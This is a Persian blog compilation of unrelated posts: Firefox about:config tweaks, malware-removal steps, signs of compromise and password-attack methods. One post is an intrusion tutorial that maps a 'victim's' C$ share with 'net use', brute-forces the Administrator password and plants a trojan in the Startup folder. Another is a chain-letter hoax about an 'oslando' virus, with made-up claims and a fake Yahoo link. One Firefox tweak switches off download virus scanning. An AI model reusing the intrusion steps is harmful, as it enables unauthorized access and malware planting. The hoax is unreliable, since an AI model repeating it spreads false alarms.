فایرفاکس مرورگری بسیار انعطاف پذیر است که تقریبأ هر نقطه ای از آن را میتوان با استفاده از تنظیمات داخلی و یا افزونه ها، بطور دلخواه ویرایش نمود. یکی از بخشهای مهم فایرفاکس ، بخش Config آن است که با تایپ عبارت about:config میتوانید به آن دسترسی داشته باشید. about:config را در اصل میتوان پشت پرده فایرفاکس دانست که با استفاده از آن تغییرات فراوانی در مرورگر امکان پذیر است. هم اکنون قصد داریم تا 17 ترفند استثنایی در بخش about:config فایرفاکس را برای شما بازگو نماییم که چگونه فایرفاکس خود را با ویرایش کلیدهای بخش Config به شکل و حالت دلخواه خود در آورید. هیچکدام از این تنظیمات در بخش Options فایرفاکس نیست و به به همین دلیل میتواند برای هر کاربری تازگی داشته باشد.

ابتدا پیش از هر کاری بایستی به محیط about:config فایرفاکس وارد شوید. بدین منظور فایرفاکس را اجرا نمایید. سپس عبارت about:config را در نوار آدرس وارد کرده و دکمه Enter را بزنید. اگر با پیغامی مواجه شدید روی دکمه I'll be careful, I promise! کلیک کنید.
به بخش Config خوش آمدید! در ادامه برای شما کاربرد و نحوه تغییر 17 کلید که وظایف جالبی را بر عهده دارند را در قالب 17 ترفند مطرح میکنیم؛
پس از اجرای هر ترفند کافی است فایرفاکس را بسته و آن را از نو باز کنید تا تغییر اعمال گردد.

1- تعیین میزان حداکثر و حداقل بزرگنمایی بر روی صفحات
با نگه داشتن کلید Ctrl و حرکت دادن غلتک موس میتونید بر روی صفحات Zoom کنید، چه به بیرون و چه به داخل. حال با ویرایش کلیدهای زیر میتوانید حداکثر و حداقل میزان بزرگنمایی را مشخص کنید:
به دنبال کلید zoom.maxPercent بگردید. این کلید حداکثر میزان «زوم به جلو» صفحات و اشیا داخل آن را مشخص میکند. با وارد کردن عدد مورد نظر، درصد حداکثر زوم را مشخص کنید.
به دنبال کلید zoom.minPercent بگردید. این کلید حداقل میزان «زوم به عقب» صفحات و اشیا داخل آن را مشخص میکند. با وارد کردن عدد مورد نظر، درصد حداقل زوم را مشخص کنید.

2- تعیین حداقل و حداکثر طول تب ها
هنگامی که تعداد تب ها در نوار تب ها کم باشد، اندازه‌شان هم بزرگتر هست و اگر تعداد تب ها زیاد باشد، فشردگی‌شان بیشتر و در نتیجه تبهای کوچکتری خواهیم داشت. حال قصد داریم حدأکثر و حدأاقل طول تب ها را در این دو وضعیت، تعیین کنیم:
بدنبال کلیدی به نام browser.tabs.tabMinWidth بگردید. بر روی آن دو بار کلیک کنید و با دادن مقدار عددی دلخواه بر حسب پیکسل، حداقل طول تب را مشخص کنید.
بدنبال کلیدی به نام browser.tabs.tabMaxWidth بگردید. بر روی آن دو بار کلیک کنید و با دادن مقدار عددی دلخواه بر حسب پیکسل، حداکثر طول تب را مشخص کنید.

3- عدم نمایش FavIcon در تب ها
شاید بخواهید که هیچ آیکونی از سایتها و وبلاگهایی که باز میکنید (Faviconها) ، در تب خودش نشان داده نشود. برای اینکار بدنبال کلیدی با نام browser.chrome.favicons بگردید و به آن مقدار False را بدهید.

4- نمایش آدرسهایی که در نوار آدرس فقط بصورت دستی تایپ شده اند
در حالت پیشفرض، هنگامی که در نوار آدرس شروع به تایپ یک کلمه یا آدرس میکنید تمام لینکها و آدرسهایی که در History ثبت شده اند و متن تایپ شده آنها، نمایش داده میشوند. این موضوع گاهی اوقات آزار دهنده میشود چرا که چندین آدرس برایتان لیست میشود و پیدا کردن آدرس مورد نظر از میان آنها خیلی سخت است. شاید دوست داشته باشید که فقط آدرسهایی را که قبلأ بصورت دستی تایپ کرده اید، در آن لیست نشان داده شود تا راحت‌تر بتوانید آدرس مورد نظر خود را بیابید.
بدین منظور دنبال کلیدی با نام browser.urlbar.matchOnlyTyped بگردید.
به آن مقدار true بدهید.

5- تعیین تعداد آدرسهای پیشنهادی در نوار آدرس
اگر دوست دارید تعداد آدرسهای پیشنهادی در نوار آدرس را کم یا زیادتر کنید مراحل زیر را دنبال کنید:
دنبال کلیدی با نام browser.urlbar.maxRichResults بگردید.
به جای مقدار 12 که پیشفرض است، مقدار دلخواه خود را تنظیم کنید.

6- نمایش پیغام "بارگذاری صفحه با مشکل مواجه شد" بصورت یک پیغام خطا، به جای نمایش متن Error در صفحه
حتمأ دیده اید هنگامی که یک صفحه وب بنا به هر دلیلی در فایرفاکس باز نشود، متن Error در همان صفحه درج میگردد. شاید شما نیز دوست داشته باشید که این Error در یک پنجره پیغام خطا -درست مثل ویندوز و نسخه های قدیمی فایرفاکس- نمایش داده شود. برای اینکار:
کلیدی با نام browser.xul.error_pages.enabled را جستجو کنید.
با دو بار کلیک بر روی آن، Value (مقدار) آن را از true به false تغییر دهید.

7- عدم نمایش کادر محاوره ای هنگام ایستادن موس بر روی دکمه های Toolbar
هنگامی که روی کلیدهای منوی ابزار توقف کنید یک کادر محاوره ای (Tool Tip) نشان داده میشود که توضیحی درباره آن کلید میدهد. برای غیر فعال کردن آن ، کافیست به کلید browser.chrome.toolbar_tips مقدار false را بدهید.

8- غیر فعال کردن Virus Scanner مرورگر
هنگامی که فایلی را با دانلود منیجر فایرفاکس دانلود کنید، بعد از اتمام دانلود آن و قبل از اینکه فایل را آماده استفاده کند، بمدت چند ثانیه فایل را با یک اسکنر برای ویروسی بودن آن چک میکند. این امر ممکن است چندان به مذاق شما خوش نیاید.
برای غیر فعال کردن آن بدنبال کلید browser.download.manager.scanWhenDone بگردید و به آن مقدار false بدهید.

9- عدم نمایش «هشدار اتمام دانلود»
بعد از اتمام دانلود فایل ها توسط دانلود منیجر فایرفاکس، پیغامی کوچک در سمت راست و پایین مرورگر ظاهر میشود و شما را از خاتمه یافتن دانلود با خبر میسازد.
برای غیرفعال کردن این پیغام به کلید browser.download.manager.showAlertOnComplete مقدار false بدهید.

10- غیرفعال کردن متن های چشمک زن
در بعضی از وبلاگها و سایتها، ممکن است در جایی از صفحه نوشته ای را ببینید که ظاهر و غیب میشود.
برای غیرفعال کردن این ویژگی ، به کلید tarfandestan browser.blink_allowed مقدار false را بدهید.

11- افزایش تعداد تب های ذخیره شده در بخش Recently Closed Tabs
وقتی در فایرفاکس یک تب را میبندید، آدرس آن در قسمت Recently Colsed Tabs موجود در منوی History ذخیره میشود که میتوانید با کلیک بر روی آدرس مورد نظر، تب بسته شده را دوباره و به سرعت باز کنید. در حالت پیشفرض فقط 10 تب در این بخش ذخیره میشود.
اگر میخواهید تعداد تب های ذخیره شده در آن را افزایش دهید، کافیست که به کلید browser.sessionstore.max_tabs_undo مقداری بیش از 10 را بدهید.

12- باز شدن تب جدید برای نمایش نتایج جستجو از Search bar
وقتی اقدام به جستجوی عبارتی در نوار جستجوی فایرفاکس میکنید، ابتدا آن را در نوار جستجو تایپ کرده و بر روی دکمه جستجو کلیک میکنید.در این هنگام، نتایج جستجو در تبی که شما در آن حضور داشتید باز میشوند.
اگر دوست دارید که هنگام کلیک بر روی دکمه جستجو، نتایج در تب جدیدی نشان داده شوند، به کلید browser.search.openintab مقدار true بدهید.

13- عوض کردن ادیتور سورس صفحات وب
اگر بخشی از صفحه (متن یا هر چیز دیگر) را با کلیک موس انتخاب یا Highlight کنید و از منوی کلیک راست گزینه View Selection Source را انتخاب کنید، سورس صفحه و آن بخش انتخاب شده در یک ادیتور که مختص خود فایرفاکس است به نمایش در می آید.
اگر میخواهید که آن ادیتور را به سلیقه خودتان عوض کنید و هنگام کلیک بر روی گزینه View Selection Source نرم افزار مورد نظرتان برای نمایش سورس صفحه پدیدار شود، مراحل زیر را دنبال کنید:
ابتدا به کلید view_source.editor.external مقدار true دهید.
سپس کلید view_source.editor.path را پیدا کرده و برای مقدار آن، از آدرس ادیتور مورد نظر خودتان استفاده کنید. مثلاً برای Notepad میتوانید مقدار C:WINDOWSNOTEPAD.EXE را به کلید بدهید تا برای نمایش سورس صفحات، از Notepad استفاده شود.

14- کمتر کردن مقدار حافظه اشغال شده توسط فایرفاکس، هنگامیکه آنرا Minimize می نمایید
با اینکار هنگامیکه شما فایرفاکس را Minimize کنید ، حدود 10 مگابایت از فضایی که فایرفاکس از رم اشغال کرده است، به Virtual Memory انتقال می یابد و اینگونه شما فضای رم بیشتری هنگام Minimize کردن فایرفاکس دارید.
برای اعمال این قابلیت ، بر روی یک کلید (هر کلیدی) کلیک راست کنید و از منوی New گزینه Boolean را انتخاب کنید. در پنجره باز شده config.trim_on_minimize را وارد کنید. در آخر مقدار True را برای کلید ساخته شده قرار دهید.

15- درجه بزرگنمایی یکسان برای همه سایتها
وقتی شما میزان Zoom یک سایت را تغییر میدهید (با کلید Ctrl و غلتک موس) ، آن مقدار بزرگنمایی فقط برای همان سایت ذخیره میشود .اگر دوست دارید که یک مقدار زوم ثابت (مثلاً 110%) بر روی همه سایتها اعمال شود، به کلید browser.zoom.siteSpecific مقدار false دهید.

16- غیرفعال کردن ویژگی محو شدن اتوماتیک Toolbar، در حالت Full Screen
وقتی در حالت Full Screen (با زدن کلید Ctrl+F11) به سر میبرید، در حالت پیشفرض نوار ابزار مرورگر بصورت اتوماتیک محو میشود و با بردن موس به بالای پنجره مرورگر دوباره نوار ابزار ظاهر میشود.
اگر میخواهید که نوار ابزار همیشه نشان داده شود و بصورت اتوماتیک محو نشود، به کلید browser.fullscreen.autohide مقدار false بدهید.

17- افزایش تعداد افزونه های نمایش داده شده در بخش Get Add-ons
در بخش Get Add-ons که از Tools->Add-ons->Get Add-ons قابل دسترسی است، مرورگر به شما 5 افزونه مفید را پیشنهاد میکند که شما میتوانید از همانجا نیز افزونه را دانلود کنید.
در صورتیکه میخواهید تعداد بیشتری افزونه به شما پیشنهاد شود، به کلید extensions.getAddons.maxResults مقداری بیشتر از 5 را دهید.

نفوذ به سيستم قرباني از طريق NetBios

با یاد گیری این مقاله شما میتونید یک درایو از سیستم قربانی رو به وسیله نت بایوس Share کنید و هر کاری که خواستید توی اون درایو انجام بدید ( فایل بذارید ، بردارید ، پاک کنید و ... )
خب بریم سره موضوع اصلی:

اول باید IP سیستم مورد نظر رو پیدا کنید ، بعد از منوی Start قسمت Run برید و تایپ کنید CMD. بعد از اینکه وارد CMD شدید این دستور رو بنویسید:

Net use x: \IPDriveName$

به جای X میتونید هر حرفی رو بنویسید به غیر از حروفی که اسم درایو های خودتون هست.مثلا اگه درایو G داشته باشید ، از حرف G نمیتونید استفاده کنید. به جای IP هم ای پی مورد نظر رو که می خواهید بهش نفوذ کنید رو بنویسید. به جای DriveName هم اسم درایو رو بنویسید. اگه مثلا میخواهید درایو C رو Share کنید ، حرف c رو بنویسید.یک نمونه از دستور رو ببینید:

Net use x: \80.191.191.39c$

اگه کمی شانس داشته باشید بدون در خواست User Name و Password درایو Share میشه و این پیغام رو مینویسه: The command completed successfully اما اگه از شما در خواست یوزر نیم و پسورد کرد به جای یوزر نیم کلمه Administrator رو وارد کنید که برای ویندوز XP و 2000 تعریف شده است ( البته معمولا تو یه خط یوزر نیم رو میده ).پسورد هم میتونید با یه برنامه مثل بروتوس( Brutus ) پیدا کنید.

اگه شما درایوی رو Share کرده باشید که ویندوز قربانی هم تو همون درایو نصب شده باشه ، می تونید سرور یک تروجان رو تو پوشه Startup تو قسمت Start Menu کپی کنید و منتظر باشد قربانی ریستارت کنه تا فایل سرور اجرا شه و شما به راحتی با تروجان به سیستم وارد بشید. ( یادتون باشه که سرور رو فقط کپی کنید چون اگه اجرا کنید در واقع تو سیستم خودتون اجرا کردید )

موفق باشید.

یه ویروس بی نهایت خطرناک ..

مخصوص مشتریان محترم Yahoo و GMAIL(تا کنون خبری مبنی بر ویروسی بودن سایر سرورهای ای میل اعلام نشده است)

دیروز از طرف کمپانی McAfee AntiVirusویروس بسیار خطرناکی شناسایی و در سایتش اعلام شده که تاکنون در عرض فقط و فقط 1 روز طبق گفته مسئولین این شرکت بیش از 10 هزار نفر آلوده به این ویروس شدن و تمام اطلاعاتی که روی درایو Cاونها بوده به کلی نابود شده.

نام این ویروس : oslando
نوع عملیات تخریبی : سخت افزاری
روش تخریب : این ویروس با جای نشین کردن یک خط کد در فایل kernell داخل پوشه systemباعث تخریب سکتور "zero" هارد کامپیوتر شما میشود و بعد از اولین خاموش روشن کردن sectorهای درایو Cمحلی که ویندوز شما در آن نصب است را burnمیکند (شدت این عمل از formatکردن هم جدی تر است به طوری که طبق گفته مک آفی این ویروس توسط ciaجهت نابود سازیه کامل اطلاعات hard diskاستفاده میشده و اصلا قابل بازیابی نمی باشد)
چگونه به این ویروس آلوده میشویم : بسیار ساده , دقیقا همینطوری کامپیوتر من به این ویروس آلوده شد , " با باز کردن یک نامه مشکوک و دانلود فایل موجود در اون نامه " که بدیش اینه که از طرف دوستتان برای شما ارسال میشود بدون اینکه او در جریان باشد (مثل ارسال pmهای آلوده به ویروس در yahoo messenger که از طرف فرد آلوده به ویروس برای قربانی ارسال میشود)

اطلاعات بیشتر در مورد این ویروس که همونطوری که میبینین مورد تایید سایت YAHOO هم قرار گرفته رو حتما مشاهده کنین , راه های پاکسازی (قبل از restartکردن ) و پیشگیری (و تست آلودگی/عدم آلودگی) به این ویروس همه به طور کامل تشریح شده :

http://www.yahoo.com/story.virus%pOSLANDO?t=13294053idbfg

روش های جلوگیری از آلودگی به این ویروس :

1- طی چند روزه آینده هیچ فایل پیوست شده یا هیچ ایمیلی را تحت عنوان postcardباز نکنید. حتی اگر این نامه از طرف دوستتان برای شما ارسال شده باشد.

2- همین حالا با forwardاین نامه به دوستانتان کامپیوتر آنها را از یک مشکل خیلی جدی نجات دهید. 20 بار دریافت کردن این نامه بهتر از آلودگی دوستتان به این ویروس است در حالی که شما میدانستید ولی دریغ کردید و به او نگفتید.

ویروس فوق حتی توسط خبرگزاری CNNبه عنوان مخرب ترین ویروس کامپیوتری اعلام شده.
این ویروس دیروز توسط کمپانی McAfeeشناسایی شد و تا کنون راهی جهت repairآن پیدا نشده.

پاک کردن ویروسی که Folder Option را حذف می کند !

شیوه ی پاک کردن ویروس BronTok.A :
در زیر به برخی از ویژگی های این ویروس اشاره می کنیم :
1 . Folder Options را حذف می کند !
2 . Registry Tools را قفل می کند !
3 . Task Manager نمی تواند فایل های مربوط به این ویروس را End کند !
4 . پس از اجرا شدن ، محتویات My Documents را نمایش می دهد !
5 . اگر در کادر محاوره ای Run عبارت CMD ، Regedit ، msconfig ، Regedt32 را تایپ کنید ، سیستم بلافاصله Restart می شود !
6 . اگر روی گزینه ی Log Off یا Turn Off Computer کلیک کنید ، سیستم Restart می شود !
7 . آیکون این ویروس شبیه آیکون یه پوشه است !
همانطور که می دانید فایل های lsass.exe ، winlogon.exe و services.exe از فایل های سیستمی بوده و همیشه در حال اجرا هستند ...
اگر شما برنامه ی Process Master را اجرا کنید ، می بینید که این فایل ها در پوشه ی System32 قرار دارند .
اما اگر ویروس BronTok.A روی سیستم شما نصب باشد ، خواهید دید که سه تا فایل دیگر با همین نام ها در حال اجرا هستند !!
یعنی دو تا winlogon.exe ، دو تا lsass.exe و دو تا services.exe !
اما به راحتی میشود فهمید که کدام ویروسند و کدام فایل اصلی ویندوز ...
آن سه تا فایلی که مربوط به ویروس میشوند ، در پوشه ای غیر از System32 قرار دارند .
مسیر دقیقشان میشود :
C:\Documents and Settings\User\Local Settings\Application Data
C نام همان درایویست که ویندوز در آن نصب گردیده و User نام کاربری است که ویروس در آن اجرا شده ...
بعد از اینکه با نرم افزار Process Master متوجه شدید که کدام ویروسند ، باید آن ها رو Kill process کنید .
اگر احیانا فایل های دیگری با نام های inetinfo.exe ، csrss.exe و smss.exe نیز در حال اجرا بودند آنها را هم Kill process کنید .البته به شرطی که مسیرشان غیر از
System32 باشد ...
حالا وقت آن است که از نرم افزار Kill BronTok.A استفاده کنید .
پس از اینکه نرم افزار Kill BronTok.A کارش تمام شد ، آن را ببندید و به منوی Start برید و روی گزینه ی Search کلیک کنید .
در سمت چپ روی گزینه ی All files and folders کلیک کنید .
در فیلد All or part of the file name عبارت Empty.pif را تایپ کنید و از روی کیبرد کلید Enter را فشار دهید .اکنون تمام فایل های پیدا شده را پاک کنید .
دوباره در فیلد مذکور عبارت زیر را تایپ کنید و از روی کیبرد کلید Enter را فشار دهید .
scr،*.exe.*
اکنون از بین فایل های پیدا شده ، هر فایلی که آیکونش شبیه آیکون پوشه بود رو پاک کنید .
مجددا در فیلد All or part of the file name عبارت زیر را تایپ کنید و از روی کیبرد کلید Enter را فشار دهید .
job.*
تمام فایل های پیدا شده را پاک کنید .

باز هم در فیلد فوق الذکر عبارت Bron را تایپ کنید و از روی کیبرد کلید Enter را فشار دهید .

اکنون تمام فایل ها و پوشه های پیدا شده را پاک کنید .

اکنون با خیال راحت کامپیوترتان را Restart کنید

پنهان كردن فايل های گوشی موبایل بدون نرم افزار

ترفندی جالب برای پنهان سازی فایل ها در داخل گوشی موبایل بدون داشتن نرم افزار

ترفند موبایل

1- با فايل منيجر موبايل بر روي همون فايلی كه می خواهيد تغييرش بدهيد برويد

2-Option =>> Rename

3- حالا پسوند فايل رو پاك مي كنيم. ( با دكمه C مي شه پاك كنيد) مي تونيد از پسوند های exe. يا txt. يا dat. استفاده كنيد و حالا براي اينكه پسوندش يادت نره اونو يه جايی تو اسمه فايلت بزار. اگه هم به كل ،اسم فايلت زايست. اسم رو هم عوض كن

4-حالا OK رو بزن

5- هر موقع فايلت رو لازم داشتيد همون طوری كه گفتم پسوند فايل رو بر می گردونی.

نكته: با اين روش فايل های كامپيوتر رو هم می توان پنهان كرد.

۱۱.۰۵.۱۳۸۷

علائم یک سیستم هک شده

از این که هک شده اید حس عجیب و مضحکی دارید، اما دقیقاً نمی دانید در مرحله ی بعدی چکار کنید. اگر مانند اکثر مردم باشید، نمی دانید الزاماً باید کجا را بگردید تا شواهدی برای به خطر افتادن سیستم تان بیابید. حال نگاهی می اندازیم به چند مورد از شواهد رایجتر که ممکن است پس از ایجاد عیب در سیستم پیدا کنید.

user account های مشکوک می بایست غیر فعال شده و جستجو کنیم چه کسی و چرا آن را ایجاد کرده است. اگر سیستم auditing (بازرسی) بدرستی فعال شده باشد، audit log ها (ثبتهای بازرسی) نشان خواهند داد چه کسی آنها را ایجاد نموده است. اگر بتوانید تاریخ و زمان ایجاد account را پیدا کنید و آن account در اثر یک هک بوجود آمده باشد، شما یک قالب زمانی خواهید داشت که می توان در آن به جستجوی دیگر رویدادهای audit log که ممکن است مرتبط باشد پرداخت.

به منظور اینکه متوجه شوید آیا برنامه ی مخربی ارتباطات ورودی را تحت کنترل دارد - که می تواند به عنوان یک پورت پنهانی برای هکر استفاده شود - از ابزارهایی مانند TCPView مربوط به Sysinternals یا Fpipe مربوط به Foundstone استفاده کنید. این ابزارهای ویندوز نشان می دهند چه برنامه هایی در حال استفاده از هر یک از پورت های باز سیستم شما هستند. در مورد سیستمهای یونیکس از netstat یا lsof که درون سیستم عامل قرار دارند استفاده کنید. از آنجا که ممکن است یک هکر باهوش netstat و lsof شما را با نسخه های تروجانی (که پورت های باز شده توسط هکرها را نشان نمی دهد) جایگزین کند، بهترین کار این است که این سیستم قربانی را با استفاده از پورت اسکنر گمنام و رایگان nmap (از سایت insecure.org) از کامپیوتر دیگر اسکن کنید. این امر به شما دو دیدگاه مختلف از پورت های باز سیستم می دهد.

هکری که یک سرور ویندوز را مورد حمله قرار می دهد، ممکن است برنامه های اجرا شده را از طریق registry در نواحی ذیل اضافه یا جایگزین کند:

• HKLM > Software > Microsoft > Windows > CurrentVersion> Run
• HKCU > Software > Microsoft > Windows > CurrentVersion> Run

نرم افزارهای مخرب نیز ممکن است از طریق دستورهای اجرای سیستم عامل اجرا شود. به منظور اینکه ببینید چه برنامه هایی در دستور اجرای یک سیستم ویندوز قرار گرفته است، به command prompt بروید و تایپ کنید AT . در یک سیستم یونیکس از فرمان های cron یا crontab استفاده کنید تا لیست فعالیت هایی را که در دستور اجرا (schedule) قرار دارند ببینید.

هکرانی که به سیستم یونیکس حمله می کنند، ممکن است از یک root kit استفاده کنند که به آنان کمک می کند با استفاده از یک خلأ آسیب پذیری در سیستم عامل یا برنامه های نصب شده، به root access دست پیدا کنند. با توجه به آن که برای هکران root kit های زیادی وجود دارد، تعیین این که کدام فایل ها دستکاری شده اند بسیار مشکل است. برنامه هایی وجود دارند که به این امر کمک می کنند، مانند chrookit.

برای یک هکر هزاران راه ممکن وجود دارد تا ردپای خود را بپوشاند، اما جستجو در موارد فوق شروع بسیار خوبی برای گشت و گذار شما جهت تشخیص خطرات سیستم و حملات هکرها است.

۱۱.۰۲.۱۳۸۷

چگونه امنيت كلمه عبور خود را تضمين كنيم؟

با توجه به رشد روز افزون صنعت آي تي و لزوم بر استفاده از بانك هاي اطلاعاتي از قبيل : شبكه هاي محلي، حساب هاي كاربري، پست الكترونيك (EMail)، دستگاه هاي خودپرداز (ATM)، عمليات بانكي ناشي از انتقال وجه و خريدهاي اينترنتي، و ... كه عموما جهت دسترسي به محتويات آن پسوورد يا كلمه عبور كاربرد بسزايي دارد و نظر به اهميت انتخاب كلمه عبور و از همه مهمتر نگهداري پسوورد
داشتن یک رمز عبور مطمئن از جمله نکات مهم برای هر کسی است که تحت وب فعالیت میکند. شمایی که روزانه به گشت و گذار در اینترنت می پردازید مطمئنا در سایت ها و انجمن های مختلفی هم عضو هستید که برای ورود به آن ها نیاز به وارد کردن کلمه عبور خود را دارید. انتخاب یک رمز عبور مطمئن (شاید) حیاتی ترین کاری است که برای امنیت اطلاعات خود باید انجام دهید. حتما شما هم اين جمله را از مسئول كامپيوتر يا شبكه يا افراد متخصص در كامپيوتر شنيده‌ايد كه "كلمه عبور خود را به ديگران ندهيد" يا جمله‌هايي شبيه به اين مبني بر حفظ و نگهداري از كلمه عبور. دليل اين همه اصرار و جمله‌هاي تكراري چيست؟ و چرا ما بايد كلمه عبور خود را از همكار يا هر فرد ديگري پنهان نگهداريم؟ به نظر شما از کجا باید فهمید که رمز عبور انتخابی تان از جهات مختلف، امنیت کامل را دارد؟!

بدون شك، تمام كاربراني كه تا به حال با كامپيوتر كار كرده‌اند، مي‌دانند كه فايل‌ها، تنها اجزاء داراي ارزش در كامپيوتر هستند كه در صورت از بين رفتن، شايد هرگز قابل برگشت نباشند. به طور كلي، انواع مختلف فايل‌هايي كه يك كاربر در طول ماه‌ها و سال‌هاي گذشته براي خود توليد يا جمع‌آوري مي‌كند، به عنوان سرمايه‌ايي براي او محسوب مي‌شود. چنانچه اين فايل‌ها مربوط به محيط كار يا پروژه‌هاي كاربر باشد، ادامه كار او به آنها بستگي دارد و چنانچه مربوط به مسائل شخصي باشد، مي‌تواند زندگي و آرامش شخص را به خطر بياندازد. همانطور كه اكنون حفظ رمز كارت‌هاي اعتباري براي همه افراد ضروري است (به دليل ارتباط مستقيم با سرمايه) بديهي است با بالا رفتن ارزش اطلاعات ديجيتال، لزوم حفظ و نگهداري از رمز نيز امري واجب خواهد شد.
با توجه به مسائل فوق، نگهداري، حفظ و انتخاب يك رمز خوب براي هر كاربر امري لازم و ضروري به نظر مي‌رسد و با توجه به افزايش دستگاه هاي ديجيتال و لزوم انتخاب رمز براي هر كدام از آنها به نظر مي‌رسد در آينده تمامي افراد، تمايل به حفظ و نگهداري رمز را در خود احساس مي‌كنند. به همين منظور لازم است كه اطلاعاتي هرچند كم در اين زمينه را داشته باشيم.
اهميت حفظ رمزها توسط صاحبان آنها به حدي است كه اكنون توصيه‌هاي بسياري در اين زمينه مي‌شود تا كاربران را مجاب به دقت بيشتر در اين راستا و همچنين فراگيري ريزه‌كاري‌هاي اين امر ‌كند. اكتشاف رمز و به دست آوردن رمز ديگران يكي از دغدغه‌هاي هكرها بوده تا با استفاده از آن بتوانند به اطلاعات شخصي يا كاري يك كاربر دست يافته يا از طريق آن وارد يك شبكه محلي شوند.





اصولا چهار روش شناخته شده براي به دست آوردن رمز ديگران وجود دارد كه در صورت آشنايي كاربران با آنها، مي‌شود درصد بسيار زيادي از آن را كاهش داد. اين چهار روش به شرح زير هستند:
1- Passive Online Attacks : در اين روش هكرها از نرم‌افزار يا سخت‌افزارهاي جاسوسي يا Sniffer ها استفاده مي‌كنند. به اين ترتيب كه اين نرم‌افزار يا سخت‌افزار با قرار گرفتن بر روي شبكه، اطلاعات در حال انتقال بر روي سيم‌ها را Sniff كرده و براي هكر ارسال مي‌كنند.(سخت‌افزارهاي Sniffer در كنار كابل شبكه (كابل‌هاي سيمي) قرار گرفته و اطلاعات داخل آن را مي‌خوانند ولي نرم‌افزارها با نصب بر روي يك كامپيوتر شبكه اين كار را انجام مي‌دهند). طبق آخرين اخبار غير رسمي، سخت‌افزار Sniffer كابل‌ فيبر نوري با قيمت 45000 دلار در آمريكا ساخته شده است.
2- Active Online Attacks : اين روش در واقع حدس زدن رمز كاربران است كه روش تجربي و با توجه به فرهنگ و ذهنيات فرد است. به طور معمول كاربران از مبتدي تا حرفه‌اي سعي مي‌كنند رمزي را براي خود در نظر بگيرند كه به راحتي بتوانند آن را در خاطر نگهدارند. به همين دليل اكثر كاربران از موارد آشنا نظير شماره شناسنامه، نام فرزند، نام همسر و ... كه همگي قابل حدس زدن مي‌باشند را به عنوان رمز خود در نظر مي‌گيرند. كاربران زرنگ‌تر از تركيب آنها استفاده مي‌كنند كه يافتن و حدس زدن آن كمي مشكل‌تر خواهد بود. هكرها نيز با توجه به اين اصل كه كارايي بسياري نيز براي آنها دارد، ابتدا اطلاعات پرسنلي افراد را يافته و با آنها به حدس‌زني رمز مي‌پردازند.3- Offline Attacks: در اين روش از ابزار نرم‌افزاري براي يافتن رمز استفاده مي‌شود. اين ابزارها معمولا بر دو نوع هستند:
3- Offline Attacks: در اين روش از ابزار نرم‌افزاري براي يافتن رمز استفاده مي‌شود. اين ابزارها معمولا بر دو نوع هستند:
الف - Dictionary Attack : ابزارهاي اين روش، با كمك گرفتن از ذهن هكر، به يافتن رمز در كلمات لغت‌نامه مي‌پردازند. براي اين كار حتي از لغت‌نامه‌هاي غير انگليسي نيز استفاده مي‌شود (لغت‌نامه فارسي نيز براي اين موضوع تهيه شده است)
ب - Brute Force : در اين روش نرم ا‌فزار ابتدا تعداد حروف رمز را با كمك هكر (يا بدون كمك) يافته و با استفاده از حروف و كلمات پيشنهادي هكر، به صورت منظم و يك به يك با جايگذاري آنها، سعي در يافتن رمز مي‌كند (به دليل تعداد بسيار بالاي حروف و اعداد، ممكن است زمان بسياري نياز داشته باشد و هرچه رمز قوي‌تر و پيچيده‌تر باشد، زمان بيشتري لازم دارد). در اين روش بديهي است كه انتخاب رمز مناسب و قوي مي‌تواند به شكست اين نرم‌افزار بيانجامد. در مواردي كه رمز قوي و مناسب است براي پيدا كردن آن، حتي ممكن است كامپيوتر احتياج به چندين سال زمان براي يافتن آن داشته باشد كه عملا غير قابل استفاده خواهد بود.
4- Non Electronic Attacks : در اين روش از راه‌هاي غير معمول و غيركامپيوتري براي يافتن رمز ديگران استفاده مي‌شود. برخي از اين روش‌ها عبارتند از:

الف- نگاه كردن به كي‌بورد هنگام تايپ كاربر بدون اينكه او متوجه شود (معمولا افرادي كه از تبحر خاص در تايپ برخوردارند يا چشمان تيزي دارند به راحتي مي‌توانند حروفي كه تايپ مي‌شوند را ببينند)
ب- از پشت سر فرد نگاه كردن
ج- كاغذ فسفري: با دادن يك كاغذ مخصوص فسفري به كاربر بدون اينكه او متوجه شود، دستانش به فسفر آغشته شده، سپس بر روي كي‌بورد اثر كلماتي كه تايپ مي‌كند، برجا خواهد ماند. البته اين اثرات در حالت عادي غير قابل رويت هستند و با نور مخصوصي كه به آنها تابيده مي‌شود، قابل رويت خواهند بود. به اين ترتيب فرد مي‌تواند متوجه رمز كاربر شود يا حداقل بخش عمده‌اي از آن را به دست آورد.
د- مهندسي اجتماعي: هكرها اعتقاد بسياري به اين مهندسي دارند. در اين روش با استفاده از فرهنگ، ذهنيات، كمبودهاي روحي و ... افراد مختلف، اطلاعات مهمي را به دست مي‌آورند. به واقع در اين روش كه بسيار نيز موثر است، با ترفندهاي مختلف، اطلاعات فرد را از خود او يا اطرافيانش به دست مي‌آورند. در اين روش بيشتر كه بر روي مسئول شبكه يا افراد مهم انجام مي‌شود و به جاي استفاده از ابزار، سعي مي‌شود با روش‌هاي مختلف گفتاري، رمز يا اطلاعاتي كه منجر به لو رفتن رمز مي‌شود را از زبان خود فرد بيرون كشيد.

علاوه بر روش‌هاي فوق كه به صورت دسته‌بندي شده وجود دارد، چند روش كه هنوز دسته بندي نشده نيز وجود دارد كه به معرفي آنها مي‌پردازيم:
1- Key Loggers: اين نوع نرم‌افزارها با قرارگيري بر روي يك سيستم، كليه استفاده‌هاي كاربر از ماوس و كي‌بورد را ضبط كرده و براي هكر ايميل مي‌كند. در اين روش حتما مي‌بايست نرم‌افزار بر روي كامپيوتر شما نصب شود پس دقت كنيد هيچ نرم‌افزاري را بدون شناسايي و نوع عملكرد بر روي كامپيوتر خود نصب نكنيد.
2- Fishing: در اين روش، صفحه‌اي مشابه يكي از سايت‌هاي معتبر جهان ساخته و براي شما ارسال مي‌شود يا اينكه شما را تشويق به ثبت نام براي شركت كردن در يك قرعه‌كشي بزرگ مي‌كند و شما نيز بدون توجه، تمام اطلاعات خود را وارد مي‌كنيد. توجه داشته باشيد حتي اگر اين كار را انجام مي‌دهيد، از رمز ايميل يا رمزهاي مهم خود در اين صفحات استفاده نكنيد و به صفحاتي كه از شما اطلاعات مي‌خواهند به راحتي پاسخ ندهيد.

در ادامه چند پيشنهاد براي حفظ رمز و نهايتا حفظ اطلاعات به شما پيشنهاد مي‌كنم، اميدوارم كه مفيد باشد:
